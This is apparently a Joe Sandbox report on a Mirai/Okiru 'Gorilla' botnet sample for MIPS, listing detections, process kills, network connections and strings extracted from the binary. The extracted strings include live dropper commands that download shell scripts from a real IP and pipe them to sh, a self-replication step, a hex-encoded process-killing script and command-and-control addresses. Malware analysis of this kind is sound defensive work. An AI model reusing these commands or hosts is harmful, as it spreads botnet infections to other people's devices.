Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mips.nn.elf

Overview

General Information

Sample name:mips.nn.elf
Analysis ID:1575253
MD5:2145cb16a925a273d569c25257eb701a
SHA1:821c929b723b9c69683f96b921132e0ff98ac9a1
SHA256:beeeaa8013f74e611c30f4a99aebe4f5e38f3403a3d8314379428ab0a1ddd244
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Sample deletes itself
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1575253
Start date and time:2024-12-15 00:46:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mips.nn.elf
Detection:MAL
Classification:mal76.troj.evad.linELF@0/2@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: mips.nn.elf
Command:/tmp/mips.nn.elf
PID:5433
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Gorilla Botnet Cats Came After You!
Standard Error:
  • system is lnxubuntu20
  • mips.nn.elf (PID: 5433, Parent: 5357, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.nn.elf
  • udisksd New Fork (PID: 5443, Parent: 802)
  • dumpe2fs (PID: 5443, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5509, Parent: 802)
  • dumpe2fs (PID: 5509, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5532, Parent: 802)
  • dumpe2fs (PID: 5532, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5533, Parent: 802)
  • dumpe2fs (PID: 5533, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sh (PID: 5534, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 5534, Parent: 1588, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • udisksd New Fork (PID: 5538, Parent: 802)
  • dumpe2fs (PID: 5538, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
mips.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    mips.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Process Memory Space: mips.nn.elf PID: 5433JoeSecurity_OkiruYara detected OkiruJoe Security
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: mips.nn.elfAvira: detected
            Source: mips.nn.elfReversingLabs: Detection: 42%
            Source: mips.nn.elfString: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginbusybox94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
            Source: mips.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
            Source: global trafficTCP traffic: 192.168.2.13:44548 -> 94.156.227.234:38242
            Source: global trafficTCP traffic: 192.168.2.13:40304 -> 154.216.19.139:199
            Source: /tmp/mips.nn.elf (PID: 5433)Socket: 0.0.0.0:38242
            Source: unknownTCP traffic detected without corresponding DNS query: 43.191.190.218
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
            Source: unknownTCP traffic detected without corresponding DNS query: 70.6.24.70
            Source: unknownTCP traffic detected without corresponding DNS query: 150.2.161.109
            Source: unknownTCP traffic detected without corresponding DNS query: 213.134.46.100
            Source: unknownTCP traffic detected without corresponding DNS query: 220.98.46.164
            Source: unknownTCP traffic detected without corresponding DNS query: 40.38.255.26
            Source: unknownTCP traffic detected without corresponding DNS query: 54.234.185.176
            Source: unknownTCP traffic detected without corresponding DNS query: 202.212.151.129
            Source: unknownTCP traffic detected without corresponding DNS query: 149.77.79.191
            Source: unknownTCP traffic detected without corresponding DNS query: 20.56.43.86
            Source: unknownTCP traffic detected without corresponding DNS query: 43.191.190.218
            Source: unknownTCP traffic detected without corresponding DNS query: 113.193.247.58
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
            Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
            Source: unknownTCP traffic detected without corresponding DNS query: 66.85.85.13
            Source: unknownTCP traffic detected without corresponding DNS query: 70.6.24.70
            Source: unknownTCP traffic detected without corresponding DNS query: 137.115.32.84
            Source: unknownTCP traffic detected without corresponding DNS query: 84.47.121.178
            Source: unknownTCP traffic detected without corresponding DNS query: 141.103.169.75
            Source: unknownTCP traffic detected without corresponding DNS query: 116.48.251.124
            Source: unknownTCP traffic detected without corresponding DNS query: 134.190.47.75
            Source: unknownTCP traffic detected without corresponding DNS query: 150.2.161.109
            Source: unknownTCP traffic detected without corresponding DNS query: 202.88.155.174
            Source: unknownTCP traffic detected without corresponding DNS query: 215.235.57.72
            Source: unknownTCP traffic detected without corresponding DNS query: 5.195.59.199
            Source: unknownTCP traffic detected without corresponding DNS query: 106.98.196.224
            Source: unknownTCP traffic detected without corresponding DNS query: 83.113.203.187
            Source: unknownTCP traffic detected without corresponding DNS query: 200.202.226.236
            Source: unknownTCP traffic detected without corresponding DNS query: 188.159.120.89
            Source: unknownTCP traffic detected without corresponding DNS query: 213.134.46.100
            Source: unknownTCP traffic detected without corresponding DNS query: 41.220.81.134
            Source: unknownTCP traffic detected without corresponding DNS query: 163.143.162.106
            Source: unknownTCP traffic detected without corresponding DNS query: 162.212.150.201
            Source: unknownTCP traffic detected without corresponding DNS query: 220.98.46.164
            Source: unknownTCP traffic detected without corresponding DNS query: 129.115.113.57
            Source: unknownTCP traffic detected without corresponding DNS query: 106.155.151.56
            Source: unknownTCP traffic detected without corresponding DNS query: 181.190.62.70
            Source: unknownTCP traffic detected without corresponding DNS query: 40.38.255.26
            Source: unknownTCP traffic detected without corresponding DNS query: 20.181.7.34
            Source: unknownTCP traffic detected without corresponding DNS query: 54.234.185.176
            Source: unknownTCP traffic detected without corresponding DNS query: 161.183.124.108
            Source: unknownTCP traffic detected without corresponding DNS query: 222.90.52.105
            Source: unknownTCP traffic detected without corresponding DNS query: 68.232.115.198
            Source: unknownTCP traffic detected without corresponding DNS query: 173.130.0.166
            Source: unknownTCP traffic detected without corresponding DNS query: 172.198.43.25
            Source: unknownTCP traffic detected without corresponding DNS query: 56.13.103.60
            Source: unknownTCP traffic detected without corresponding DNS query: 97.153.125.245
            Source: unknownTCP traffic detected without corresponding DNS query: 156.226.204.106
            Source: mips.nn.elfString found in binary or memory: http://94.156.227.233/
            Source: mips.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
            Source: mips.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
            Source: mips.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktc
            Source: Initial sampleString containing 'busybox' found: usage: busybox
            Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
            Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
            Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: /tmp/mips.nn.elf (PID: 5470)SIGKILL sent: pid: 792, result: successful
            Source: /tmp/mips.nn.elf (PID: 5470)SIGKILL sent: pid: 884, result: successful
            Source: /tmp/mips.nn.elf (PID: 5470)SIGKILL sent: pid: 1944, result: successful
            Source: /tmp/mips.nn.elf (PID: 5470)SIGKILL sent: pid: 3181, result: successful
            Source: /tmp/mips.nn.elf (PID: 5470)SIGKILL sent: pid: 3185, result: successful
            Source: /tmp/mips.nn.elf (PID: 5470)SIGKILL sent: pid: 5534, result: successful
            Source: classification engineClassification label: mal76.troj.evad.linELF@0/2@0/0
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5585/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5586/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5587/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5533/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5599/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5534/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5538/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5591/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5592/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5593/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5594/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5276/cmdline
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5595/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5596/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5597/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5532/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5598/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5590/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/1588/cmdline
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5588/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5589/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5600/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/802/cmdline
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5601/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5602/status
            Source: /tmp/mips.nn.elf (PID: 5461)File opened: /proc/5603/status

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: /tmp/mips.nn.elf (PID: 5433)File: /tmp/mips.nn.elfJump to behavior
            Source: /tmp/mips.nn.elf (PID: 5433)Queries kernel information via 'uname':
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/grub-editenv1/usr/bin/vmware-namespace-cmd`!/usr/bin/bzfgrep1/usr/bin/networkd-dispatcher
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/dev/vmci0 /dev/zfs1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/mdoc-validate1/usr/bin/xfce4-taskmanager`!/usr/bin/uncompress1/usr/bin/purple-url-handler0!/usr/bin/sg_ident!/usr/bin/qemu-mips641/usr/bin/instmodshps/s10!/usr/bin/thunar-volman!/usr/bin/enchant-2108!
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U1/usr/bin/vmware-vgauth-cmd
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /mips/usr/bin/qemu-mipsel
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblazeel
            Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.zlEnOZ\$
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc32plus
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv32
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64el
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/speaker-test1/usr/bin/vmware-toolbox-cmd`!/usr/bin/ntfsusermap1/usr/bin/ubuntu-bugs/s10!/usr/bin/lsmem0!/usr/bin/sg_opcodes!/usr/bin/notify-send/us1p
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-alpha
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/qemu-nios2!/usr/bin/dpkg-deb
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-s390x
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4eb
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/expand0!/usr/bin/ttfread1/usr/bin/sha384sumps/s10!/usr/bin/curl0!/usr/bin/slogin1/usr/bin/catU/mips/s10!/usr/bin/captoinfo!/usr/bin/mconfig1/usr/bin/telnet.netkits10!/usr/bin/vmware-rpctool!/usr/bin/eps2eps1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/racc2y2.7!/var/run/mono-xsp4.pid1/usr/bin/resizeparts/a10!/usr/bin/slxdecode!/var/run/mono-xsp41/usr/bin/pydoc3/mips/a10!/usr/bin/debconf-escape!/var/run/crond.reboot1/usr/bin/users-admin/a10!/usr/bin/gdb-add-index!/var/run/sshd1/usr/bin/ssh-import-id-lp0!/usr/bin/qemu-armeb!/var/run/crond.pid1/usr/bin/csharp/mips/10!/usr/bin/podselect!/var/run/udisks21/usr/bin/x86_64-linux-gnu-elfedit&W
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/qemu-mipsn32el!/usr/bin/xzcmp K
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-hgfsclient
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/dbus-monitor1/usr/bin/gimp-test-clipboard-2.01/usr/bin/grotty/mips/s10!/usr/bin/parecord!/usr/bin/sg_rdac1/usr/bin/phar.pharps/s10!/usr/bin/pinky0!/usr/bin/ciptool1/usr/bin/lofficemips/10!/usr/bin/pygettext3!/usr/bin/qemu-tilegx1/usr/bin/gnome-shell-extension-tool
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /mips/usr/bin/qemu-cris
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/qemu-mipsn32!/usr/bin/btattach1@
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/usr/bin/qemu-mipsel
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-nios2
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/usr/bin/vmwarectrl
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblaze
            Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmpBinary or memory string: MPDIR%s/qemu-op
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /mips/usr/bin/qemu-microblazeel
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-cris
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipselUQ`
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/systemd1/usr/bin/mono-find-requires`!/usr/bin/rendercheck1/usr/bin/qemu-sparc32plus
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64le
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/atq01/usr/bin/sg_sat_identify1/usr/bin/vmware-checkvm10!/usr/bin/uxterm0!/usr/bin/chacl1/usr/bin/x86_64-linux-gnu-size
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips/var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-toolbox-cmd
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-hppa
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/oclock0!/usr/bin/ssh-argv01/usr/bin/systemd-id128s10!/usr/bin/pic0!/usr/bin/lspci1/usr/bin/mate-calc-cmds10!/usr/bin/strip0!/usr/bin/unpack2001/usr/bin/systemctlps/10!/usr/bin/rview0!/usr/bin/qemu-riscv641/usr/bin/keep-one-running
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /mips/dev/vmci
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/qemu-hppa!/usr/bin/ptar1/usr/bin/linkiccmips/s10!/usr/bin/xmodmap!/usr/bin/usb_printerid1/usr/bin/gnome-session-custom-session!/usr/bin/pdftocairo!/usr/bin/php1/usr/bin/foo2oak-wrapper0!/usr/bin/locale-check1/usr/bin/automat-visualize31/usr/bin/sg_ses_microcodebin/[0!/usr/bin/sg_bg_ctl!/usr/bin/domainname1/usr/bin/avahi-browse-domains
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /var/run/vmware
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-xferlogs
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/ubuntu-drivers!/usr/bin/pdftohtml1/usr/bin/setsid/mips/s10!/usr/bin/ikdasm0!/usr/bin/trust1/usr/bin/vmware-hgfsclient0!/usr/bin/tzselect!/usr/bin/paste1/usr/bin/chcon/mips/s10!/usr/bin/rcp0!/usr/bin/ldd1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/bsd-from!/usr/bin/resgen21/usr/bin/spice-vdagents10!/usr/bin/twist30!/usr/bin/qemu-sparc641`-"
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/proc/2935/exe1/tmp/vmware-root_727-42906909660!/usr/bin/xfce4-panel!/proc/2936/exe1/usr/lib/bluetooth/obexd0!/proc/3147/exe0!/proc/2961/exe1/proc/3342/exe/mips/r10!/usr/bin/xfsettingsd!/proc/2964/exe1/tmp/.X11-unix/mips/r10!/proc/3146/exe01/usr/bin/gnome-keyring-daemon1/usr/lib/bluetoothps/s10!/usr/bin/xfwm40!/proc/2970/exe1/var/run/dmeventd-client0!/proc/3134/exe0!/proc/2972/exe1/usr/lib/x86_64-linux-gnu/xfce4/panel!/usr/bin/gpg-agent!/proc/2974/exe1/usr/libexec/geoclue-2.0/demos/agent
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/sqlsharp1/usr/bin/vmware-xferlogs`!/usr/bin/caspol1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/resgen!/usr/bin/x11perfcomp/us1/usr/bin/qemu-microblazeel
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/foo2hbpl21/usr/bin/xfce4-popup-applicationsmenu!/usr/bin/ppdpo1/usr/bin/qemu-ppcips/s10!/usr/bin/rvim0!/usr/bin/pf2afm1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-checkvm
